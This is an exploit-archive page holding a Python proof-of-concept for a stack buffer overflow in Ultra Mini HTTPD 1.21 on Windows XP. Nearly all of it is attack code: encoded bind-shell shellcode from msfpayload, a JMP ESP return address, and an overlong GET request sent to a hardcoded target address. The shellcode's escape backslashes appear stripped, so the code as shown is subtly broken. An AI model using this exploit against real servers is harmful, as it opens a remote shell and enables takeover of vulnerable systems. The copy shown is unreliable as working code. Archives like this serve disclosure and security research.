Ultra Mini HTTPD 1.21 - Stack Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Ultra Mini HTTPD 1.21 - Stack Buffer Overflow
# Published : 2013-07-11
# Author :
# Previous Title : ASUS RT-AC66U acsd Param - Remote Root Shell Exploit
# Next Title : Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution

# Exploit Title: Ultra Mini HTTPD stack buffer overflow
# Date: 10 July 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.picolix.jp/
# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
# Version: 1.21
# Tested on: Windows XP Professional SP2, English
#
# Description: 
# A buffer overflow is triggered when requesting a very long 
# resource name. 
#

import socket
import struct

# msfpayload windows/shell_bind_tcp R | 
#     msfencode -b "x00x0ax0dx20x0bx09x0c"
# [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

shellcode = ( 
"xbax1fxb5xaexa1xddxc4xd9x74x24xf4x5ex33xc9" +
"xb1x56x31x56x13x83xc6x04x03x56x10x57x5bx5d" +
"xc6x1exa4x9ex16x41x2cx7bx27x53x4ax0fx15x63" +
"x18x5dx95x08x4cx76x2ex7cx59x79x87xcbxbfxb4" +
"x18xfax7fx1axdax9cx03x61x0ex7fx3dxaax43x7e" +
"x7axd7xabxd2xd3x93x19xc3x50xe1xa1xe2xb6x6d" +
"x99x9cxb3xb2x6dx17xbdxe2xddx2cxf5x1ax56x6a" +
"x26x1axbbx68x1ax55xb0x5bxe8x64x10x92x11x57" +
"x5cx79x2cx57x51x83x68x50x89xf6x82xa2x34x01" +
"x51xd8xe2x84x44x7ax61x3exadx7axa6xd9x26x70" +
"x03xadx61x95x92x62x1axa1x1fx85xcdx23x5bxa2" +
"xc9x68x38xcbx48xd5xefxf4x8bxb1x50x51xc7x50" +
"x85xe3x8ax3cx6axdex34xbdxe4x69x46x8fxabxc1" +
"xc0xa3x24xccx17xc3x1fxa8x88x3ax9fxc9x81xf8" +
"xcbx99xb9x29x73x72x3axd5xa6xd5x6ax79x18x96" +
"xdax39xc8x7ex31xb6x37x9ex3ax1cx4ex98xf4x44" +
"x03x4fxf5x7axb2xd3x70x9cxdexfbxd4x36x76x3e" +
"x03x8fxe1x41x61xa3xbaxd5x3dxadx7cxd9xbdxfb" +
"x2fx76x15x6cxbbx94xa2x8dxbcxb0x82xc4x85x53" +
"x58xb9x44xc5x5dx90x3ex66xcfx7fxbexe1xecxd7" +
"xe9xa6xc3x21x7fx5bx7dx98x9dxa6x1bxe3x25x7d" +
"xd8xeaxa4xf0x64xc9xb6xccx65x55xe2x80x33x03" +
"x5cx67xeaxe5x36x31x41xacxdexc4xa9x6fx98xc8" +
"xe7x19x44x78x5ex5cx7bxb5x36x68x04xabxa6x97" +
"xdfx6fxd6xddx7dxd9x7fxb8x14x5bxe2x3bxc3x98" +
"x1bxb8xe1x60xd8xa0x80x65xa4x66x79x14xb5x02" +
"x7dx8bxb6x06"
)

# 7C941EED  , JMP ESP , ntdll.dll
payload =  "A" * 5392 + struct.pack("<I", 0x7C941EED)
payload += "x81xc4xf0xeaxffxff" + shellcode + "B" * 4230

print "[+] sending payload, length", len(payload)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.37.175", 80))

buf = (
	"GET /" + payload + " HTTP/1.1rn" + 
	"Host: 192.168.37.175" + 
	"rnrn"
)

s.send(buf)
s.close()